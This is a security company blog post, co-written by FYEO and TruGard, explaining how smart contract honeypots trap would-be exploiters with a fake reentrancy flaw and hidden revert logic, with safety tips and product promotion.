FYEO’s security team has partnered with TruGard to bring security insights to Web3. This is the first in a series of collaborative posts between the two security companies.
Trugard is a real-time cybersecurity and threat intelligence startup focused on bringing safety and security to Web3 users and developers around the world. Leveraging state of the art ML/AI, and proven security techniques, practices, and procedures, Trugard delivers safety insights driving both retail and enterprise use cases. Using their advanced API, customers needing enhanced due diligence, and increased transaction confidence are now able to help keep their users safe from making potentially costly or risky transactions. FYEO’s team of elite code auditors is manually checking many of the most risky transactions to verify vulnerabilities to help raise the security profile of the entire industry. In this first blog post we will examine honeypots.
Beware of Smart Contract Honeypots
In the dynamic world of blockchain and cryptocurrencies, security is paramount. One of the more insidious threats lurking in this space is the smart contract honeypot. These traps are designed to look like lucrative opportunities but end up ensnaring unsuspecting users. Recently, TruGard, an AI contract analyst, has detected numerous honeypots across various EVM based chains such as Binance Smart Chain, Polygon, Base and Arbitrum, highlighting the importance of vigilance in the crypto space. To ensure the accuracy of these findings, FYEO has manually verified many of the vulnerabilities and honeypots identified by TruGard, underscoring the critical need for reliable security measures.
What is a Smart Contract Honeypot?
Imagine finding what appears to be a wallet full of cash left unattended on the street. You might be tempted to pick it up, thinking you've just come across free money. But what if, as soon as you touch the wallet, a trap springs, and you lose all the money in your own wallet? This is essentially how a smart contract honeypot works in the digital realm.
A smart contract honeypot is a malicious contract designed to lure individuals by appearing to have a vulnerability that allows anyone to extract funds from it. The would-be exploiter, thinking they've found a way to make easy money, sends Ethereum (ETH) to interact with the contract. Instead of reaping the rewards, they trigger hidden mechanisms within the contract that transfer their funds to the attacker. Thus, the exploiter becomes the exploited.
How Do Honeypots Trap Users?
Honeypots exploit the greed of users looking for exploitable contracts. Here’s a simplified version of how it often works:
Bait: The honeypot contract appears to have a flaw. This might look like a misconfigured permission setting or a seemingly easy way to withdraw funds.
Interaction: The user, believing they've found an exploitable vulnerability, sends a small amount of ETH to interact with the contract.
Trap: The contract executes hidden code that either locks up the user’s funds or transfers them directly to the attacker’s wallet.
Loss: The user realizes too late that they’ve been tricked and their funds are gone.
The Role of TruGard in Detecting Honeypots
TruGard is an advanced AI contract analyst that has been instrumental in identifying such malicious contracts. By scanning various networks like Binance Smart Chain, Polygon, Base and Arbitrum, TruGard has uncovered not just many honeypots, but also contracts with other vulnerabilities. This AI tool analyzes contracts for vulnerabilities, suspicious patterns and hidden threats, providing an additional layer of security for the crypto community. Taking advantage of this dataset, it becomes very easy to observe campaigns. A campaign is described as a long running, and coordinated sequence of events designed to extract assets from unsuspecting users. The convergence of web3 indicators of compromise, and time ordered sequence of events, enables researchers and investigators to truly understand the scope of honeypot activity, and more.
Below is an example of one such honeypot campaign that continues to be executed unchallenged for over a year.
What Does a Honeypot Look Like?
A honeypot smart contract could pretend to have a reentrancy vulnerability that appears to let attackers withdraw all Ethereum in the contract. However, it secretly contains a trap:
When you deposit money, everything works as expected, and your deposit is recorded.
When you try to withdraw money, the contract checks hidden rules. If you don't meet these hidden rules (which you never will), your withdrawal fails.
This way, the contract keeps your deposited money, and you can't get it back, effectively stealing your funds if you try to exploit or use it.
These hidden rules could be implemented in a linked contract that diverges from the presented implementation and these hidden rules could for example cause a revert, making it a clever honeypot that traps and steals funds from would-be exploiters.
Imagine the creator of the honeypot uploads it to a public site like Etherscan where anyone can view it. The code has an obvious vulnerability in the Withdraw function, which makes it seem like it's easy to exploit. A potential hacker might think they can take advantage of this vulnerability by creating a contract that deposits 1 ether and then withdraws it repeatedly to drain the contract's funds.
However, the code shown here isn't the whole story. The actual deployed Log contract is different. The creator has added a secret line in the deployed version that prevents anyone but themselves from withdrawing funds. Specifically, they added a line in the AddMessage function to revert (cancel) the transaction if anyone other than the creator tries to withdraw money. So, while the code looks vulnerable and tempting to exploit, it actually traps anyone who tries to do so.
Here's a simplified version of the contract:
Staying Safe in the Crypto Space
To protect yourself from honeypots and other scams:
Be Skeptical: If something seems too good to be true, it probably is. Always question unusually lucrative opportunities.
Research: Before interacting with any contract, do thorough research. Look for audits and reviews of the contract.
Use Trusted Tools: Leverage tools like TruGard and FYEO Ygent to analyze contracts and websites before engaging with them.
Stay Updated: The crypto landscape is ever-evolving. Keep abreast of the latest security threats and best practices.
In conclusion, while smart contract honeypots are a sophisticated and dangerous form of scam, being aware of their existence and employing robust security measures can help you navigate the crypto world safely. Trust in tools like TruGard and FYEO's decentralized password manager, KryptPass, to keep your investments secure and always stay vigilant.
Comments